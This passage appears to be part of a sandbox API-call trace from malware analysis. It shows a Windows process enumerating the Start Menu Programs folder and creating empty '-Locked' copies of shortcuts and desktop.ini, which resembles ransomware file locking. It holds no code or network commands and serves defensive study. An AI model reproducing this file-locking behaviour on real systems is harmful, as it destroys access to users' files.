lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Word 2016.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Word 2016.lnk-Locked", lpFilePart=0x0) returned 0x49 [0299.852] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0299.852] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Word 2016.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\word 2016.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.857] GetFileType (hFile=0x49c) returned 0x1 [0299.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0299.857] GetFileType (hFile=0x49c) returned 0x1 [0299.859] CloseHandle (hObject=0x49c) returned 1 [0299.859] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af19c) returned 1 [0299.860] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs", nBufferLength=0x105, lpBuffer=0x1aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs", lpFilePart=0x0) returned 0x34 [0299.860] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\", nBufferLength=0x105, lpBuffer=0x1aec78, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\", lpFilePart=0x0) returned 0x35 [0299.860] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\*", lpFindFileData=0x1aeec4 | out: lpFindFileData=0x1aeec4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x32a4e933, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x331f452f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.860] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x32a4e933, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x331f452f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.860] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32a26553, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32a26553, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32a26553, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Access 2016.lnk-Locked", cAlternateFileName="ACCESS~2.LNK")) returned 1 [0299.861] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32fded4c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32fded4c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32fded4c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Access 2016.lnk-Locked-Locked", cAlternateFileName="ACCESS~1.LNK")) returned 1 [0299.861] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x36990d0, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x36990d0, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessibility", cAlternateFileName="ACCESS~1")) returned 1 [0299.861] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7088bbcb, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x7088bbcb, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessories", cAlternateFileName="ACCESS~2")) returned 1 [0299.861] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7088bbcb, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x7088bbcb, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Administrative Tools", cAlternateFileName="ADMINI~1")) returned 1 [0299.861] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32a3b0b5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32a3b0b5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32a3b0b5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0299.862] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32fe75bf, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32fe75bf, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32fe75bf, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked-Locked", cAlternateFileName="DESKTO~2.INI")) returned 1 [0299.862] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x25, ftCreationTime.dwLowDateTime=0x23bf23db, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x23bf23db, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x23bf23db, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x355, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0299.862] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32a4d5a3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32a4d5a3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32feeb06, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.lnk-Locked", cAlternateFileName="DESKTO~1.LNK")) returned 1 [0299.862] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32ff7406, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32ff7406, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32ff7406, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.lnk-Locked-Locked", cAlternateFileName="DESKTO~2.LNK")) returned 1 [0299.863] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x25, ftCreationTime.dwLowDateTime=0x503ebe79, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x503ebe79, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x503ebe79, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x895, dwReserved0=0x0, dwReserved1=0x0, cFileName="Devices Flow.lnk", cAlternateFileName="")) returned 1 [0299.863] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32ffe8fd, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32ffe8fd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32ffe8fd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Devices Flow.lnk-Locked", cAlternateFileName="DEVICE~1.LNK")) returned 1 [0299.863] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91c425ce, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x91c425ce, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x91c73351, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x99d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Excel 2016.lnk", cAlternateFileName="EXCEL2~1.LNK")) returned 1 [0299.863] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3300bf7b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3300bf7b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3300bf7b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Excel 2016.lnk-Locked", cAlternateFileName="EXCEL2~2.LNK")) returned 1 [0299.863] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x25, ftCreationTime.dwLowDateTime=0x503ebe79, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x503ebe79, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x503ebe79, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x92d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Immersive Control Panel.lnk", cAlternateFileName="")) returned 1 [0299.864] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33015c3f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x33015c3f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x33015c3f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Immersive Control Panel.lnk-Locked", cAlternateFileName="IMMERS~1.LNK")) returned 1 [0299.864] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x36e5585, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x36e5585, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Maintenance", cAlternateFileName="MAINTE~1")) returned 1 [0299.864] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91cbc61e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x9833cf8e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x9833cf8e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office 2016 Tools", cAlternateFileName="MICROS~1")) returned 1 [0299.864] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x25, ftCreationTime.dwLowDateTime=0x1a440bee, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a440bee, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a440bee, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="MiracastView.lnk", cAlternateFileName="")) returned 1 [0299.865] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33026e36, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x33026e36, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x33026e36, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MiracastView.lnk-Locked", cAlternateFileName="MIRACA~1.LNK")) returned 1 [0299.865] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9856516c, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x9856516c, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x98566539, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x9ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneDrive for Business.lnk", cAlternateFileName="ONEDRI~1.LNK")) returned 1 [0299.865] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x330d7df5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x330d7df5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x330d7df5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneDrive for Business.lnk-Locked", cAlternateFileName="ONEDRI~2.LNK")) returned 1 [0299.865] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9875e8e4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x9875e8e4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x9875faea, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x989, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneNote 2016.lnk", cAlternateFileName="ONENOT~1.LNK")) returned 1 [0299.865] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x330e2d16, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x330e2d16, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x330e2d16, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneNote 2016.lnk-Locked", cAlternateFileName="ONENOT~2.LNK")) returned 1 [0299.866] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9887255b, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x9887255b, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x988738f2, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x997, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook 2016.lnk", cAlternateFileName="OUTLOO~1.LNK")) returned 1 [0299.866] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x330eb8b8, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x330eb8b8, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x330eb8b8, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook 2016.lnk-Locked", cAlternateFileName="OUTLOO~2.LNK")) returned 1 [0299.866] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989fca23, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x989fca23, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x989fde6b, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x9c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPoint 2016.lnk", cAlternateFileName="POWERP~1.LNK")) returned 1 [0299.867] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x330f3e9e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x330f3e9e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x330f3e9e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPoint 2016.lnk-Locked", cAlternateFileName="POWERP~2.LNK")) returned 1 [0299.867] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x25, ftCreationTime.dwLowDateTime=0x502baba5, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x502baba5, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x502baba5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x897, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintDialog.lnk", cAlternateFileName="")) returned 1 [0299.867] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x330fa0ce, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x330fa0ce, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x330fa0ce, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintDialog.lnk-Locked", cAlternateFileName="PRINTD~1.LNK")) returned 1 [0299.867] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98bdb45f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x98bdb45f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x98bdc5e8, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x991, dwReserved0=0x0, dwReserved1=0x0, cFileName="Publisher 2016.lnk", cAlternateFileName="PUBLIS~1.LNK")) returned 1 [0299.868] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33101567, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x33101567, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x33101567, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Publisher 2016.lnk-Locked", cAlternateFileName="PUBLIS~2.LNK")) returned 1 [0299.868] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x25, ftCreationTime.dwLowDateTime=0x2007da5a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2007da5a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2007da5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x634, dwReserved0=0x0, dwReserved1=0x0, cFileName="Search.lnk", cAlternateFileName="")) returned 1 [0299.868] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33118891, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x33118891, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x33118891, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Search.lnk-Locked", cAlternateFileName="SEARCH~1.LNK")) returned 1 [0299.868] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98d3e739, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x98d3e739, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x98d3faa2, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x9c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Skype for Business 2016.lnk", cAlternateFileName="SKYPEF~1.LNK")) returned 1 [0299.869] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x331e8076, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x331e8076, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x331e8076, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Skype for Business 2016.lnk-Locked", cAlternateFileName="SKYPEF~2.LNK")) returned 1 [0299.869] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x36e5585, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x36e5585, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartUp", cAlternateFileName="")) returned 1 [0299.870] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x370b7e7, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x370b7e7, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Tools", cAlternateFileName="SYSTEM~1")) returned 1 [0299.870] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x6ec87d0d, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6ec87d0d, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tablet PC", cAlternateFileName="TABLET~1")) returned 1 [0299.870] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98de5a53, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x98de5a53, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x98de5a53, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x9c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word 2016.lnk", cAlternateFileName="WORD20~1.LNK")) returned 1 [0299.870] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x331f452f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x331f452f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x331f452f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word 2016.lnk-Locked", cAlternateFileName="WORD20~2.LNK")) returned 1 [0299.871] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x331f452f, 